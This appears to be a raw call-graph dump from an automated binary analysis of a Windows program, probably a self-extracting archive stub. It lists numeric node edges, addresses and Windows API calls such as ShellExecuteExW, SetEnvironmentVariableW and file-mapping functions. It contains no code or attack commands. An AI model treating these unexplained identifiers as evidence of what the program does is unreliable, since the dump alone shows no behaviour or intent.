24491->24442 24492->24462 24493->24445 24495 ccd084 24494->24495 24496 ccd072 24494->24496 24526 cc603a 82 API calls 24495->24526 24525 cc603a 82 API calls 24496->24525 24499 ccd07c 24499->24447 24500->24460 24501->24462 24503 cd22a1 24502->24503 24504 cd22ba 24503->24504 24507 cd22ce 24503->24507 24527 cd0eed 86 API calls 24504->24527 24506 cd22c1 24506->24507 24508->24442 24509->24469 24510->24471 24511->24475 24513 ccb146 GetVersionExW 24512->24513 24514 cc7c69 24513->24514 24514->24484 24521 ccd12a __InternalCxxFrameHandler 24515->24521 24516 ccd29a 24517 ccd2ce 24516->24517 24518 ccd0cb 6 API calls 24516->24518 24519 cd0e08 SetThreadExecutionState RaiseException 24517->24519 24518->24517 24522 ccd291 24519->24522 24520 cd8c8d 103 API calls 24520->24521 24521->24516 24521->24520 24521->24522 24523 ccac05 91 API calls 24521->24523 24522->24490 24523->24521 24524->24490 24525->24499 24526->24499 24527->24506 24528->24247 24529->24247 24530->24249 24532 cc5d2a 24531->24532 24578 cc5c4b 24532->24578 24534 cc5d95 24534->24263 24536 cc5d5d 24536->24534 24583 ccb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24536->24583 24538 cc8186 24537->24538 24539 cc8232 24538->24539 24590 ccbe5e 19 API calls __InternalCxxFrameHandler 24538->24590 24589 cd1fac CharUpperW 24539->24589 24542 cc823b 24542->24266 24544 cc7c22 24543->24544 24545 cc7c5a 24544->24545 24591 cc6e7a 74 API calls 24544->24591 24545->24271 24547 cc7c52 24592 cc138b 74 API calls 24547->24592 24549->24329 24551 cc9db3 24550->24551 24554 cc9dc2 24550->24554 24552 cc9db9 FlushFileBuffers 24551->24552 24551->24554 24552->24554 24553 cc9e3f SetFileTime 24553->24334 24554->24553 24555->24257 24556->24262 24557->24262 24558->24271 24559->24271 24560->24273 24561->24285 24562->24286 24563->24285 24565 cc98c5 GetFileType 24564->24565 24566 cc8b5a 24564->24566 24565->24566 24566->24281 24567 cc2021 74 API calls 24566->24567 24567->24297 24568->24281 24569->24301 24570->24324 24571->24324 24572->24324 24573->24324 24574->24324 24575->24330 24576->24337 24577->24327 24584 cc5b48 24578->24584 24580 cc5c6c 24580->24536 24582 cc5b48 2 API calls 24582->24580 24583->24536 24587 cc5b52 24584->24587 24585 cc5c3a 24585->24580 24585->24582 24587->24585 24588 ccb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24587->24588 24588->24587 24589->24542 24590->24539 24591->24547 24592->24545 24594 cccef2 24593->24594 24599 cca99e 86 API calls 24594->24599 24596 cccf24 24600 cca99e 86 API calls 24596->24600 24598 cccf2f 24599->24596 24600->24598 24601->24346 24603 cca6a8 24602->24603 24604 cca727 FindNextFileW 24603->24604 24605 cca6c1 FindFirstFileW 24603->24605 24606 cca732 GetLastError 24604->24606 24612 cca709 24604->24612 24607 cca6d0 24605->24607 24605->24612 24606->24612 24608 ccbb03 GetCurrentDirectoryW 24607->24608 24609 cca6e0 24608->24609 24610 cca6fe GetLastError 24609->24610 24611 cca6e4 FindFirstFileW 24609->24611 24610->24612 24611->24610 24611->24612 24612->24197 24622 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24613->24622 24615 cda5cd 24616 cda5d9 24615->24616 24623 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24615->24623 24616->23995 24616->23996 24618->24002 24619->24005 24620->24005 24621->24008 24622->24615 24623->24616 24624->24015 24626 cc9f42 78 API calls 24625->24626 24627 cc1fe8 24626->24627 24628 cc2005 24627->24628 24629 cc1a04 101 API calls 24627->24629 24628->24024 24628->24025 24630 cc1ff5 24629->24630 24630->24628 24632 cc138b 74 API calls 24630->24632 24632->24628 24633 cc13e1 84 API calls 2 library calls 25346 cd94e0 GetClientRect 25382 cd21e0 26 API calls std::bad_exception::bad_exception 25409 cdf2e0 46 API calls __RTC_Initialize 25410 cebee0 GetCommandLineA GetCommandLineW 25347 ce2cfb 38 API calls 4 library calls 25383 cc95f0 80 API calls 25384 cdfd4f 9 API calls 2 library calls 25411 cc5ef0 82 API calls 24656 ce98f0 24664 ceadaf 24656->24664 24660 ce990c 24661 ce9919 24660->24661 24672 ce9920 11 API calls 24660->24672 24663 ce9904 24673 ceac98 24664->24673 24667 ceadee TlsAlloc 24668 ceaddf 24667->24668 24669 cdfbbc CatchGuardHandler 5 API calls 24668->24669 24670 ce98fa 24669->24670 24670->24663 24671 ce9869 20 API calls 2 library calls 24670->24671 24671->24660 24672->24663 24674 ceacc8 24673->24674 24678 ceacc4 24673->24678 24674->24667 24674->24668 24675 ceace8 24675->24674 24677 ceacf4 GetProcAddress 24675->24677 24679 cead04 __dosmaperr 24677->24679 24678->24674 24678->24675 24680 cead34 24678->24680 24679->24674 24681 cead4a 24680->24681 24682 cead55 LoadLibraryExW 24680->24682 24681->24678 24683 cead8a 24682->24683 24684 cead72 GetLastError 24682->24684 24683->24681 24686 ceada1 FreeLibrary 24683->24686 24684->24683 24685 cead7d LoadLibraryExW 24684->24685 24685->24683 24686->24681 24688 ceabf0 24690 ceabfb 24688->24690 24691 ceac24 24690->24691 24693 ceac20 24690->24693 24694 ceaf0a 24690->24694 24701 ceac50 DeleteCriticalSection 24691->24701 24695 ceac98 __dosmaperr 5 API calls 24694->24695 24696 ceaf31 24695->24696 24697 ceaf4f InitializeCriticalSectionAndSpinCount 24696->24697 24698 ceaf3a 24696->24698 24697->24698 24699 cdfbbc CatchGuardHandler 5 API calls 24698->24699 24700 ceaf66 24699->24700 24700->24690 24701->24693 25349 ce88f0 7 API calls ___scrt_uninitialize_crt 25386 cdb18d 78 API calls 25350 cdc793 97 API calls 4 library calls 25412 cdc793 102 API calls 4 library calls 25388 cd9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25352 ceb49d 6 API calls CatchGuardHandler 25428 cc6faa 111 API calls 3 library calls 25390 cdeda7 48 API calls _unexpected 25354 cddca1 DialogBoxParamW 25429 cdf3a0 27 API calls 25357 cea4a0 71 API calls _free 25358 cf08a0 IsProcessorFeaturePresent 25430 cd1bbd GetCPInfo IsDBCSLeadByte 25391 cdb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24855 cdf3b2 24856 cdf3be ___scrt_is_nonwritable_in_current_image 24855->24856 24887 cdeed7 24856->24887 24858 cdf3c5 24859 cdf518 24858->24859 24862 cdf3ef 24858->24862 24960 cdf838 4 API calls 2 library calls 24859->24960 24861 cdf51f 24953 ce7f58 24861->24953 24864 cdf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24862->24864 24898 ce8aed 24862->24898 24872 cdf48f 24864->24872 24956 ce7af4 38 API calls 3 library calls 24864->24956 24870 cdf40e 24906 cdf953 GetStartupInfoW __cftof 24872->24906 24874 cdf495 24907 ce8a3e 51 API calls 24874->24907 24877 cdf49d 24908 cddf1e 24877->24908 24881 cdf4b1 24881->24861 24882 cdf4b5 24881->24882 24883 cdf4be 24882->24883 24958 ce7efb 28 API calls _abort 24882->24958 24959 cdf048 12 API calls ___scrt_uninitialize_crt 24883->24959 24886 cdf4c6 24886->24870 24888 cdeee0 24887->24888 24962 cdf654 IsProcessorFeaturePresent 24888->24962 24890 cdeeec 24963 ce2a5e 24890->24963 24892 cdeef1 24893 cdeef5 24892->24893 24971 ce8977 24892->24971 24893->24858 24896 cdef0c 24896->24858 24899 ce8b04 24898->24899 24900 cdfbbc CatchGuardHandler 5 API calls 24899->24900 24901 cdf408 24900->24901 24901->24870 24902 ce8a91 24901->24902 24904 ce8ac0 24902->24904 24903 cdfbbc CatchGuardHandler 5 API calls 24905 ce8ae9 24903->24905 24904->24903 24905->24864 24906->24874 24907->24877 25064 cd0863 24908->25064 24912 cddf3d 25113 cdac16 24912->25113 24914 cddf46 __cftof 24915 cddf59 GetCommandLineW 24914->24915 24916 cddf68 24915->24916 24917 cddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24915->24917 25117 cdc5c4 24916->25117 24918 cc4092 _swprintf 51 API calls 24917->24918 24920 cde04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24918->24920 25128 cdb6dd LoadBitmapW 24920->25128 24923 cddf76 OpenFileMappingW 24927 cddf8f MapViewOfFile 24923->24927 24928 cddfd6 CloseHandle 24923->24928 24924 cddfe0 25122 cddbde 24924->25122 24929 cddfcd UnmapViewOfFile 24927->24929 24930 cddfa0 __InternalCxxFrameHandler 24927->24930 24928->24917 24929->24928 24935 cddbde 2 API calls 24930->24935 24937 cddfbc 24935->24937 24936 cd90b7 8 API calls 24938 cde0aa DialogBoxParamW 24936->24938 24937->24929 24939 cde0e4 24938->24939 24940 cde0fd 24939->24940 24941 cde0f6 Sleep 24939->24941 24943 cde10b 24940->24943 25158 cdae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24940->25158 24941->24940 24944 cde12a DeleteObject 24943->24944 24945 cde13f DeleteObject 24944->24945 24948 cde146 24944->24948 24945->24948 24946 cde189 25155 cdac7c 24946->25155 24947 cde177 25159 cddc3b 6 API calls 24947->25159 24948->24946 24948->24947 24951 cde17d CloseHandle 24951->24946 24952 cde1c3 24957 cdf993 GetModuleHandleW 24952->24957 25289 ce7cd5 24953->25289 24956->24872 24957->24881 24958->24883 24959->24886 24960->24861 24962->24890 24975 ce3b07 24963->24975 24967 ce2a6f 24968 ce2a7a 24967->24968 24989 ce3b43 DeleteCriticalSection 24967->24989 24968->24892 24970 ce2a67 24970->24892 25018 cec05a 24971->25018 24974 ce2a7d 7 API calls 2 library calls 24974->24893 24976 ce3b10 24975->24976 24978 ce3b39 24976->24978 24979 ce2a63 24976->24979 24990 ce3d46 24976->24990 24995 ce3b43 DeleteCriticalSection 24978->24995 24979->24970 24981 ce2b8c 24979->24981 25011 ce3c57 24981->25011 24984 ce2ba1 24984->24967 24986 ce2baf 24987 ce2bbc 24986->24987 25017 ce2bbf 6 API calls ___vcrt_FlsFree 24986->25017 24987->24967 24989->24970 24996 ce3c0d 24990->24996 24993 ce3d7e InitializeCriticalSectionAndSpinCount 24994 ce3d69 24993->24994 24994->24976 24995->24979 24997 ce3c26 24996->24997 24998 ce3c4f 24996->24998 24997->24998 25003 ce3b72 24997->25003 24998->24993 24998->24994 25001 ce3c3b GetProcAddress 25001->24998 25002 ce3c49 25001->25002 25002->24998 25008 ce3b7e ___vcrt_FlsSetValue 25003->25008 25004 ce3bf3 25004->24998 25004->25001 25005 ce3b95 LoadLibraryExW 25006 ce3bfa 25005->25006 25007 ce3bb3 GetLastError 25005->25007 25006->25004 25009 ce3c02 FreeLibrary 25006->25009 25007->25008 25008->25004 25008->25005 25010 ce3bd5 LoadLibraryExW 25008->25010 25009->25004 25010->25006 25010->25008 25012 ce3c0d ___vcrt_FlsSetValue 5 API calls 25011->25012 25013 ce3c71 25012->25013 25014 ce3c8a TlsAlloc 25013->25014 25015 ce2b96 25013->25015 25015->24984 25016 ce3d08 6 API calls ___vcrt_FlsSetValue 25015->25016 25016->24986 25017->24984 25019 cec077 25018->25019 25022 cec073 25018->25022 25019->25022 25024 cea6a0 25019->25024 25020 cdfbbc CatchGuardHandler 5 API calls 25021 cdeefe 25020->25021 25021->24896 25021->24974 25022->25020 25025 cea6ac ___scrt_is_nonwritable_in_current_image 25024->25025 25036 ceac31 EnterCriticalSection 25025->25036 25027 cea6b3 25037 cec528 25027->25037 25029 cea6c2 25035 cea6d1 25029->25035 25050 cea529 29 API calls 25029->25050 25032 cea6cc 25051 cea5df GetStdHandle GetFileType 25032->25051 25033 cea6e2 _abort 25033->25019 25052 cea6ed LeaveCriticalSection _abort 25035->25052 25036->25027 25038 cec534 ___scrt_is_nonwritable_in_current_image 25037->25038 25039 cec558 25038->25039 25040 cec541 25038->25040 25053 ceac31 EnterCriticalSection 25039->25053 25061 ce91a8 20 API calls __dosmaperr 25040->25061 25043 cec564 25049 cec590 25043->25049 25054 cec479 25043->25054 25044 cec546 25062 ce9087 26 API calls __cftof 25044->25062 25046 cec550 _abort 25046->25029 25063 cec5b7 LeaveCriticalSection _abort 25049->25063 25050->25032 25051->25035 25052->25033 25053->25043 25055 ceb136 __dosmaperr 20 API calls 25054->25055 25058 cec48b 25055->25058 25056 cec498 25057 ce8dcc _free 20 API calls 25056->25057 25059 cec4ea 25057->25059 25058->25056 25060 ceaf0a 11 API calls 25058->25060 25059->25043 25060->25058 25061->25044 25062->25046 25063->25046 25065 cdec50 25064->25065 25066 cd086d GetModuleHandleW 25065->25066 25067 cd0888 GetProcAddress 25066->25067 25068 cd08e7 25066->25068 25069 cd08b9 GetProcAddress 25067->25069 25070 cd08a1 25067->25070 25071 cd0c14 GetModuleFileNameW 25068->25071 25169 ce75fb 42 API calls __vsnwprintf_l 25068->25169 25074 cd08cb 25069->25074 25070->25069 25086 cd0c32 25071->25086 25073 cd0b54 25073->25071 25075 cd0b5f GetModuleFileNameW CreateFileW 25073->25075 25074->25068 25076 cd0b8f SetFilePointer 25075->25076 25077 cd0c08 CloseHandle 25075->25077 25076->25077 25078 cd0b9d ReadFile 25076->25078 25077->25071 25078->25077 25081 cd0bbb 25078->25081 25081->25077 25083 cd081b 2 API calls 25081->25083 25082 cd0c94 GetFileAttributesW 25085 cd0cac 25082->25085 25082->25086 25083->25081 25084 cd0c5d CompareStringW 25084->25086 25087 cd0cb7 25085->25087 25090 cd0cec 25085->25090 25086->25082 25086->25084 25086->25085 25160 ccb146 25086->25160 25163 cd081b 25086->25163 25089 cd0cd0 GetFileAttributesW 25087->25089 25091 cd0ce8 25087->25091 25088 cd0dfb 25112 cda64d GetCurrentDirectoryW 25088->25112 25089->25087 25089->25091 25090->25088 25092 ccb146 GetVersionExW 25090->25092 25091->25090 25093 cd0d06 25092->25093 25094 cd0d0d 25093->25094 25095 cd0d73 25093->25095 25097 cd081b 2 API calls 25094->25097 25096 cc4092 _swprintf 51 API calls 25095->25096 25098 cd0d9b AllocConsole 25096->25098 25099 cd0d17 25097->25099 25100 cd0da8 GetCurrentProcessId AttachConsole 25098->25100 25101 cd0df3 ExitProcess 25098->25101 25102 cd081b 2 API calls 25099->25102 25170 ce3e13 25100->25170 25104 cd0d21 25102->25104 25106 cce617 53 API calls 25104->25106 25105 cd0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25105->25101 25107 cd0d3c 25106->25107 25108 cc4092 _swprintf 51 API calls 25107->25108 25109 cd0d4f 25108->25109 25110 cce617 53 API calls 25109->25110 25111 cd0d5e 25110->25111 25111->25101 25112->24912 25114 cd081b 2 API calls 25113->25114 25115 cdac2a OleInitialize 25114->25115 25116 cdac4d GdiplusStartup SHGetMalloc 25115->25116 25116->24914 25118 cdc5ce 25117->25118 25119 cdc6e4 25118->25119 25120 cd1fac CharUpperW 25118->25120 25172 ccf3fa 82 API calls 2 library calls 25118->25172 25119->24923 25119->24924 25120->25118 25123 cdec50 25122->25123 25124 cddbeb SetEnvironmentVariableW 25123->25124 25125 cddc0e 25124->25125 25126 cddc36 25125->25126 25127 cddc2a SetEnvironmentVariableW 25125->25127 25126->24917 25127->25126 25129 cdb6fe 25128->25129 25130 cdb70b GetObjectW 25128->25130 25173 cda6c2 FindResourceW 25129->25173 25132 cdb71a 25130->25132 25134 cda5c6 4 API calls 25132->25134 25137 cdb72d 25134->25137 25135 cdb770 25147 ccda42 25135->25147 25136 cdb74c 25187 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25136->25187 25137->25135 25137->25136 25138 cda6c2 12 API calls 25137->25138 25140 cdb73d 25138->25140 25140->25136 25143 cdb743 DeleteObject 25140->25143 25141 cdb754 25188 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25141->25188 25143->25136 25144 cdb75d 25189 cda80c 8 API calls 25144->25189 25146 cdb764 DeleteObject 25146->25135 25198 ccda67 25147->25198 25152 cd90b7 25153 cdeb38 8 API calls 25152->25153 25154 cd90d6 25153->25154 25154->24936 25156 cdacab GdiplusShutdown OleUninitialize 25155->25156 25156->24952 25158->24943 25159->24951 25161 ccb15a GetVersionExW 25160->25161 25162 ccb196 25160->25162 25161->25162 25162->25086 25164 cdec50 25163->25164 25165 cd0828 GetSystemDirectoryW 25164->25165 25166 cd085e 25165->25166 25167 cd0840 25165->25167 25166->25086 25168 cd0851 LoadLibraryW 25167->25168 25168->25166 25169->25073 25171 ce3e1b 25170->25171 25171->25105 25171->25171 25172->25118 25174 cda7d3 25173->25174 25175 cda6e5 SizeofResource 25173->25175 25174->25130 25174->25132 25175->25174 25176 cda6fc LoadResource 25175->25176 25176->25174 25177 cda711 LockResource 25176->25177 25177->25174 25178 cda722 GlobalAlloc 25177->25178 25178->25174 25179 cda73d GlobalLock 25178->25179 25180 cda7cc GlobalFree 25179->25180 25181 cda74c __InternalCxxFrameHandler 25179->25181 25180->25174 25182 cda7c5 GlobalUnlock 25181->25182 25190 cda626 GdipAlloc 25181->25190 25182->25180 25185 cda79a GdipCreateHBITMAPFromBitmap 25186 cda7b0 25185->25186 25186->25182 25187->25141 25188->25144 25189->25146 25191 cda638 25190->25191 25193 cda645 25190->25193 25194 cda3b9 25191->25194 25193->25182 25193->25185 25193->25186 25195 cda3da GdipCreateBitmapFromStreamICM 25194->25195 25196 cda3e1 GdipCreateBitmapFromStream 25194->25196 25197 cda3e6 25195->25197 25196->25197 25197->25193 25199 ccda75 __EH_prolog 25198->25199 25200 ccdaa4 GetModuleFileNameW 25199->25200 25201 ccdad5 25199->25201 25202 ccdabe 25200->25202 25244 cc98e0 25201->25244 25202->25201 25204 ccdb31 25255 ce6310 25204->25255 25205 cc959a 80 API calls 25207 ccda4e 25205->25207 25206 cce261 78 API calls 25209 ccdb05 25206->25209 25242 cce29e GetModuleHandleW FindResourceW 25207->25242 25209->25204 25209->25206 25235 ccdd4a 25209->25235 25210 ccdb44 25211 ce6310 26 API calls 25210->25211 25218 ccdb56 ___vcrt_FlsSetValue 25211->25218 25213 cc9e80 79 API calls 25213->25218 25214 ccdc9f ___std_exception_copy 25216 cc9bd0 82 API calls 25214->25216 25214->25235 25220 ccdcc8 ___std_exception_copy 25216->25220 25218->25213 25219 ccdc85 25218->25219 25218->25235 25269 cc9bd0 25218->25269 25274 cc9d70 81 API calls 25218->25274 25219->25235 25275 cc9d70 81 API calls 25219->25275 25220->25235 25240 ccdcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25220->25240 25276 cd1b84 MultiByteToWideChar 25220->25276 25222 cce159 25227 cce1de 25222->25227 25282 ce8cce 26 API calls 2 library calls 25222->25282 25225 cce16e 25283 ce7625 26 API calls 2 library calls 25225->25283 25226 cce1c6 25284 cce27c 78 API calls 25226->25284 25228 cce214 25227->25228 25231 cce261 78 API calls 25227->25231 25232 ce6310 26 API calls 25228->25232 25231->25227 25233 cce22d 25232->25233 25234 ce6310 26 API calls 25233->25234 25234->25235 25235->25205 25237 cd1da7 WideCharToMultiByte 25237->25240 25240->25222 25240->25235 25240->25237 25277 cce5b1 50 API calls __vsnprintf 25240->25277 25278 ce6159 26 API calls 3 library calls 25240->25278 25279 ce8cce 26 API calls 2 library calls 25240->25279 25280 ce7625 26 API calls 2 library calls 25240->25280 25281 cce27c 78 API calls 25240->25281 25243 ccda55 25242->25243 25243->25152 25246 cc98ea 25244->25246 25245 cc994b CreateFileW 25247 cc996c GetLastError 25245->25247 25250 cc99bb 25245->25250 25246->25245 25248 ccbb03 GetCurrentDirectoryW 25247->25248 25249 cc998c 25248->25249 25249->25250 25251 cc9990 CreateFileW GetLastError 25249->25251 25252 cc99ff 25250->25252 25254 cc99e5 SetFileTime 25250->25254 25251->25250 25253 cc99b5 25251->25253 25252->25209 25253->25250 25254->25252 25256 ce6349 25255->25256 25257 ce634d 25256->25257 25268 ce6375 25256->25268 25285 ce91a8 20 API calls __dosmaperr 25257->25285 25259 ce6352 25286 ce9087 26 API calls __cftof 25259->25286 25260 ce6699 25262 cdfbbc CatchGuardHandler 5 API calls 25260->25262 25264 ce66a6 25262->25264 25263 ce635d 25265 cdfbbc CatchGuardHandler 5 API calls 25263->25265 25264->25210 25266 ce6369 25265->25266 25266->25210 25268->25260 25287 ce6230 5 API calls CatchGuardHandler 25268->25287 25270 cc9bdc 25269->25270 25271 cc9be3 25269->25271 25270->25218 25271->25270 25273 cc9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25271->25273 25288 cc6d1a 77 API calls 25271->25288 25273->25271 25274->25218 25275->25214 25276->25240 25277->25240 25278->25240 25279->25240 25280->25240 25281->25240 25282->25225 25283->25226 25284->25227 25285->25259 25286->25263 25287->25268 25288->25271 25290 ce7ce1 _unexpected 25289->25290 25291 ce7cfa 25290->25291 25292 ce7ce8 25290->25292 25313 ceac31 EnterCriticalSection 25291->25313 25325 ce7e2f GetModuleHandleW 25292->25325 25295 ce7ced 25295->25291 25326 ce7e73 GetModuleHandleExW 25295->25326 25296 ce7d9f 25314 ce7ddf 25296->25314 25300 ce7d76 25304 ce7d8e 25300->25304 25309 ce8a91 _abort 5 API calls 25300->25309 25302 ce7dbc 25317 ce7dee 25302->25317 25303 ce7de8 25335 cf2390 5 API calls CatchGuardHandler 25303->25335 25310 ce8a91 _abort 5 API calls 25304->25310 25305 ce7d01 25305->25296 25305->25300 25334 ce87e0 20 API calls _abort 25305->25334 25309->25304 25310->25296 25313->25305 25336 ceac81 LeaveCriticalSection 25314->25336 25316 ce7db8 25316->25302 25316->25303 25337 ceb076 25317->25337 25320 ce7e1c 25323 ce7e73 _abort 8 API calls 25320->25323 25321 ce7dfc GetPEB 25321->25320 25322 ce7e0c GetCurrentProcess TerminateProcess 25321->25322 25322->25320 25324 ce7e24 ExitProcess 25323->25324 25325->25295 25327 ce7e9d GetProcAddress 25326->25327 25328 ce7ec0 25326->25328 25329 ce7eb2 25327->25329 25330 ce7ecf 25328->25330 25331 ce7ec6 FreeLibrary 25328->25331 25329->25328 25332 cdfbbc CatchGuardHandler 5 API calls 25330->25332 25331->25330 25333 ce7cf9 25332->25333 25333->25291 25334->25300 25336->25316 25338 ceb09b 25337->25338 25342 ceb091 25337->25342 25339 ceac98 __dosmaperr 5 API calls 25338->25339 25339->25342 25340 cdfbbc CatchGuardHandler 5 API calls 25341 ce7df8 25340->25341 25341->25320 25341->25321 25342->25340 23403 cde44b 23404 cde3f4 23403->23404 23406 cde85d 23404->23406 23432 cde5bb 23406->23432 23408 cde86d 23409 cde8ca 23408->23409 23420 cde8ee 23408->23420 23410 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23409->23410 23411 cde8d5 RaiseException 23410->23411 23425 cdeac3 23411->23425 23412 cde9d9 23416 cdea95 23412->23416 23419 cdea37 GetProcAddress 23412->23419 23413 cde966 LoadLibraryExA 23414 cde979 GetLastError 23413->23414 23415 cde9c7 23413->23415 23418 cde9a2 23414->23418 23429 cde98c 23414->23429 23415->23412 23417 cde9d2 FreeLibrary 23415->23417 23441 cde7fb 23416->23441 23417->23412 23421 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23418->23421 23419->23416 23422 cdea47 GetLastError 23419->23422 23420->23412 23420->23413 23420->23415 23420->23416 23423 cde9ad RaiseException 23421->23423 23427 cdea5a 23422->23427 23423->23425 23425->23404 23426 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23428 cdea7b RaiseException 23426->23428 23427->23416 23427->23426 23430 cde5bb ___delayLoadHelper2@8 6 API calls 23428->23430 23429->23415 23429->23418 23431 cdea92 23430->23431 23431->23416 23433 cde5ed 23432->23433 23434 cde5c7 23432->23434 23433->23408 23449 cde664 23434->23449 23436 cde5cc 23437 cde5e8 23436->23437 23452 cde78d 23436->23452 23457 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23437->23457 23440 cde836 23440->23408 23442 cde80d 23441->23442 23443 cde82f 23441->23443 23444 cde664 DloadReleaseSectionWriteAccess 3 API calls 23442->23444 23443->23425 23445 cde812 23444->23445 23446 cde82a 23445->23446 23447 cde78d DloadProtectSection 3 API calls 23445->23447 23460 cde831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23446->23460 23447->23446 23458 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23449->23458 23451 cde669 23451->23436 23453 cde7a2 DloadProtectSection 23452->23453 23454 cde7dd VirtualProtect 23453->23454 23455 cde7a8 23453->23455 23459 cde6a3 VirtualQuery GetSystemInfo 23453->23459 23454->23455 23455->23437 23457->23440 23458->23451 23459->23454 23460->23443 25361 cda440 GdipCloneImage GdipAlloc 25413 ce3a40 5 API calls CatchGuardHandler 25433 cf1f40 CloseHandle 23598 cdcd58 23600 cdce22 23598->23600 23605 cdcd7b 23598->23605 23610 cdc793 _wcslen _wcsrchr 23600->23610 23626 cdd78f 23600->23626 23602 cdd40a 23604 cd1fbb CompareStringW 23604->23605 23605->23600 23605->23604 23606 cdca67 SetWindowTextW 23606->23610 23610->23602 23610->23606 23612 cdc855 SetFileAttributesW 23610->23612 23617 cdcc31 GetDlgItem SetWindowTextW SendMessageW 23610->23617 23620 cdcc71 SendMessageW 23610->23620 23625 cd1fbb CompareStringW 23610->23625 23650 cdb314 23610->23650 23654 cda64d GetCurrentDirectoryW 23610->23654 23656 cca5d1 6 API calls 23610->23656 23657 cca55a FindClose 23610->23657 23658 cdb48e 76 API calls 2 library calls 23610->23658 23659 ce3e3e 23610->23659 23614 cdc90f GetFileAttributesW 23612->23614 23624 cdc86f __cftof _wcslen 23612->23624 23614->23610 23615 cdc921 DeleteFileW 23614->23615 23615->23610 23618 cdc932 23615->23618 23617->23610 23619 cc4092 _swprintf 51 API calls 23618->23619 23621 cdc952 GetFileAttributesW 23619->23621 23620->23610 23621->23618 23622 cdc967 MoveFileW 23621->23622 23622->23610 23623 cdc97f MoveFileExW 23622->23623 23623->23610 23624->23610 23624->23614 23655 ccb991 51 API calls 2 library calls 23624->23655 23625->23610 23628 cdd799 __cftof _wcslen 23626->23628 23627 cdd9e7 23627->23610 23628->23627 23629 cdd9c0 23628->23629 23634 cdd8a5 23628->23634 23675 cd1fbb CompareStringW 23628->23675 23629->23627 23633 cdd9de ShowWindow 23629->23633 23633->23627 23672 cca231 23634->23672 23635 cdd8d9 ShellExecuteExW 23635->23627 23642 cdd8ec 23635->23642 23637 cdd8d1 23637->23635 23638 cdd925 23677 cddc3b 6 API calls 23638->23677 23639 cdd97b CloseHandle 23640 cdd989 23639->23640 23641 cdd994 23639->23641 23678 cd1fbb CompareStringW 23640->23678 23641->23629 23642->23638 23642->23639 23643 cdd91b ShowWindow 23642->23643 23643->23638 23646 cdd93d 23646->23639 23647 cdd950 GetExitCodeProcess 23646->23647 23647->23639 23648 cdd963 23647->23648 23648->23639 23651 cdb31e 23650->23651 23652 cdb3f0 ExpandEnvironmentStringsW 23651->23652 23653 cdb40d 23651->23653 23652->23653 23653->23610 23654->23610 23655->23624 23656->23610 23657->23610 23658->23610 23660 ce8e54 23659->23660 23661 ce8e6c 23660->23661 23662 ce8e61 23660->23662 23664 ce8e74 23661->23664 23670 ce8e7d __dosmaperr 23661->23670 23693 ce8e06 23662->23693 23665 ce8dcc _free 20 API calls 23664->23665 23668 ce8e69 23665->23668 23666 ce8ea7 HeapReAlloc 23666->23668 23666->23670 23667 ce8e82 23700 ce91a8 20 API calls __dosmaperr 23667->23700 23668->23610 23670->23666 23670->23667 23701 ce7a5e 7 API calls 2 library calls 23670->23701 23679 cca243 23672->23679 23675->23634 23676 ccb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23676->23637 23677->23646 23678->23641 23687 cdec50 23679->23687 23682 cca23a 23682->23635 23682->23676 23683 cca261 23689 ccbb03 23683->23689 23685 cca275 23685->23682 23686 cca279 GetFileAttributesW 23685->23686 23686->23682 23688 cca250 GetFileAttributesW 23687->23688 23688->23682 23688->23683 23690 ccbb10 _wcslen 23689->23690 23691 ccbbb8 GetCurrentDirectoryW 23690->23691 23692 ccbb39 _wcslen 23690->23692 23691->23692 23692->23685 23694 ce8e44 23693->23694 23695 ce8e14 __dosmaperr 23693->23695 23703 ce91a8 20 API calls __dosmaperr 23694->23703 23695->23694 23696 ce8e2f RtlAllocateHeap 23695->23696 23702 ce7a5e 7 API calls 2 library calls 23695->23702 23696->23695 23698 ce8e42 23696->23698 23698->23668 23700->23668 23701->23670 23702->23695 23703->23698 25362 cde455 14 API calls ___delayLoadHelper2@8 23739 cec051 31 API calls CatchGuardHandler 25434 ce7f6e 52 API calls 3 library calls 25415 ce8268 55 API calls _free 25363 cdc793 107 API calls 4 library calls 24635 cc9f7a 24636 cc9f8f 24635->24636 24637 cc9f88 24635->24637 24638 cc9f9c GetStdHandle 24636->24638 24645 cc9fab 24636->24645 24638->24645 24639 cca003 WriteFile 24639->24645 24640 cc9fcf 24641 cc9fd4 WriteFile 24640->24641 24640->24645 24641->24640 24641->24645 24643 cca095 24647 cc6e98 77 API calls 24643->24647 24645->24637 24645->24639 24645->24640 24645->24641 24645->24643 24646 cc6baa 78 API calls 24645->24646 24646->24645 24647->24637 24648 cc9a74 24649 cc9a7e 24648->24649 24650 cc9b9d SetFilePointer 24649->24650 24652 cc981a 79 API calls 24649->24652 24653 cc9ab1 24649->24653 24654 cc9b79 24649->24654 24651 cc9bb6 GetLastError 24650->24651 24650->24653 24651->24653 24652->24654 24654->24650 25365 cc1075 84 API calls 25366 cda070 10 API calls 25416 cdb270 99 API calls 25436 cc1f72 128 API calls __EH_prolog 25368 cda400 GdipDisposeImage GdipFree 25417 cdd600 70 API calls 25369 ce6000 QueryPerformanceFrequency QueryPerformanceCounter 25398 ce2900 6 API calls 4 library calls 25418 cef200 51 API calls 25437 cea700 21 API calls 25439 cc1710 86 API calls 25402 cdad10 73 API calls 25403 ceb4ae 